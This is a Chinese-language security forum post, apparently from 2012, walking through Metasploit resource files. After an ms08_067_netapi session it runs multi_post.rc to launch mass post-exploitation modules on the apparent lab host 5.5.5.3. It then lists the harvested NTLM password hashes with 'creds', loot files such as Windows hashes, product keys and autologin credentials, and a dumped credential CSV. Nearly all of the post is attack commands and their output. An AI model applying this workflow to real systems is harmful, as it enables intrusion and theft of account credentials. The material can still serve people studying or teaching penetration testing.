切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
182 METASPLOIT rc 文件 2[复制链接]
发表于 2012-10-2 16:03:57 | 显示全部楼层 |!read_mode!
拿默认的RC文件做个掩饰
  1. root@Dis9Team:/pen/msf3/scripts/resource# pwd
  2. /pen/msf3/scripts/resource
  3. root@Dis9Team:/pen/msf3/scripts/resource# cat multi_post.rc
复制代码
他的作用是运行大量的post-exploitation,尝试一下
官方的有这么几个
  1. meterpreter > resource(Tab键盘键)
  2. resource .svn                    resource nessus_vulns_cleaner.rc
  3. resource auto_brute.rc           resource oracle_login.rc
  4. resource auto_cred_checker.rc    resource oracle_sids.rc
  5. resource auto_pass_the_hash.rc   resource oracle_tns.rc
  6. resource autocrawler.rc          resource port_cleaner.rc
  7. resource autoexploit.rc          resource portscan.rc
  8. resource basic_discovery.rc      resource run_all_post.rc
  9. resource fileformat_generator.rc resource wmap_autotest.rc
  10. resource multi_post.rc           
复制代码


运行:
  1. meterpreter > background
  2. [*] Backgrounding session 1...
  3. msf  exploit(ms08_067_netapi) > resource multi_post.rc
  4. [*] Processing multi_post.rc for ERB directives.
  5. [*] resource (multi_post.rc)> Ruby Code (3930 bytes)
  6. [*] starting with post exploitation stuff
  7. starting meterpreter commands on session number 1
  8. running meterpreter command sysinfo

  9. running meterpreter command getuid

  10. running meterpreter command getpid

  11. running meterpreter command ps

  12. running meterpreter command ipconfig

  13. [*] starting the post exploitation with post exploitation modules
  14. [*] Session ID: 1 - IP: 5.5.5.3
  15. SESSION => 1
  16. [*] Post module running as background job
  17. [-] Failed to load module: post/multi/gather/ssh_creds
  18. SESSION => 1
  19. [*] Post module running as background job
  20. SESSION => 1
  21. [*] Post module running as background job
  22. SESSION => 1
  23. [*] Post module running as background job
  24. SESSION => 1
  25. [*] Post module running as background job
  26. SESSION => 1
  27. [*] Post module running as background job
  28. SESSION => 1
  29. [*] Post module running as background job
  30. SESSION => 1
  31. [-] Post failed: Msf::OptionValidateError The following options failed to validate: GROUP.
  32. SESSION => 1
  33. [*] Post module running as background job
  34. SESSION => 1
  35. [*] Post module running as background job
  36. SESSION => 1
  37. [*] Post module running as background job
  38. SESSION => 1
  39. [*] Post module running as background job
  40. SESSION => 1
  41. [*] Post module running as background job
  42. SESSION => 1
  43. [*] Post module running as background job
  44. SESSION => 1
  45. [*] Post module running as background job
  46. SESSION => 1
  47. [*] Post module running as background job
  48. SESSION => 1
  49. [*] Post module running as background job
  50. SESSION => 1
  51. [*] Post module running as background job
  52. SESSION => 1
  53. [*] Post module running as background job
  54. SESSION => 1
  55. [*] Post module running as background job
  56. SESSION => 1
  57. [*] Post module running as background job
  58. SESSION => 1
  59. [*] Post module running as background job
  60. msf >
复制代码


查看任务


  1. msf > jobs

  2. Jobs
  3. ====

  4.   Id  Name
  5.   --  ----
  6.   16  Post: windows/gather/enum_services
  7.   19  Post: windows/gather/enum_devices

  8. msf >
复制代码


查看结果
  1. msf > creds

  2. Credentials
  3. ===========

  4. host     port  user              pass                                                               type      active?
  5. ----     ----  ----              ----                                                               ----      -------
  6. 5.5.5.3  445   brk               aad3b435b51404eeaad3b435b51404ee:3766ecc9dc50a0a090a75679f31c4b3a  smb_hash  true
  7. 5.5.5.3  445   123456            8b86e21cefcfcf65ecd325169ec0434c:d342530f678ab7fbc07aca16546fff1d  smb_hash  true
  8. 5.5.5.3  445   Administrator     d50be5c283a925b9d8341d61ed718f0f:3d33ff03e9ae50a031e9e0b7d83a9be1  smb_hash  true
  9. 5.5.5.3  445   HelpAssistant     5ad7c2ebeb03e4f9e490a7484285e4d7:013dac1c0a4a4d849d73526d1076f725  smb_hash  true
  10. 5.5.5.3  445   SUPPORT_388945a0  aad3b435b51404eeaad3b435b51404ee:aeaa2735ff0d4c78acc2c7e8fef81de2  smb_hash  true

  11. [*] Found 5 credentials.
  12. msf >
复制代码


详细结果



  1. msf > loot

  2. Loot
  3. ====

  4. host     service  type                          name                              content     info                                path
  5. ----     -------  ----                          ----                              -------     ----                                ----
  6. 5.5.5.3           host.ms_keys                  ms_keys.txt                       text/plain  Microsoft Product Key and Info      /root/.msf4/loot/20120716082020_default_5.5.5.3_host.ms_keys_763590.txt
  7. 5.5.5.3           host.users.recent             recent_users.txt                  text/plain  Recent Users                        /root/.msf4/loot/20120716082018_default_5.5.5.3_host.users.recen_211339.txt
  8. 5.5.5.3           host.applications             applications.txt                  text/plain  Installed Applications              /root/.msf4/loot/20120716082017_default_5.5.5.3_host.application_749067.txt
  9. 5.5.5.3           windows.autologin.user.creds  windows-autologin-user-creds.csv  text/csv    Windows AutoLogin User Credentials  /root/.msf4/loot/20120716082017_default_5.5.5.3_windows.autologi_637637.csv
  10. 5.5.5.3           host.users.active             active_users.txt                  text/plain  Active Users                        /root/.msf4/loot/20120716082017_default_5.5.5.3_host.users.activ_588678.txt
  11. 5.5.5.3           windows.environment                                             text/plain                                      /root/.msf4/loot/20120716082016_default_5.5.5.3_windows.environm_369903.txt
  12. 5.5.5.3           windows.environment                                             text/plain                                      /root/.msf4/loot/20120716082016_default_5.5.5.3_windows.environm_464320.txt
  13. 5.5.5.3           hosts.confige                 hosts_file.txt                    text/plain  Windows Hosts File                  /root/.msf4/loot/20120716082015_default_5.5.5.3_hosts.confige_087381.txt
  14. 5.5.5.3           windows.hashes                WWWDIS9COM_hashes.txt             text/plain  Windows Hashes                      /root/.msf4/loot/20120716082014_default_5.5.5.3_windows.hashes_482830.txt

  15. msf >
复制代码


查看:
5.5.5.3 windows.autologin.user.creds windows-autologin-user-creds.csv text/csv Windows AutoLogin User Credentials /root/.msf4/loot/20120716082017_default_5.5.5.3_windows.autologi_637637.csv
  1. msf > cat /root/.msf4/loot/20120716082017_default_5.5.5.3_windows.autologi_637637.csv
  2. [*] exec: cat /root/.msf4/loot/20120716082017_default_5.5.5.3_windows.autologi_637637.csv

  3. UserName,Password,Domain
  4. "brk","","WWWDIS9COM"
  5. "brk","","WWWDIS9COM"
  6. msf >
复制代码



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-11-28 03:22

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部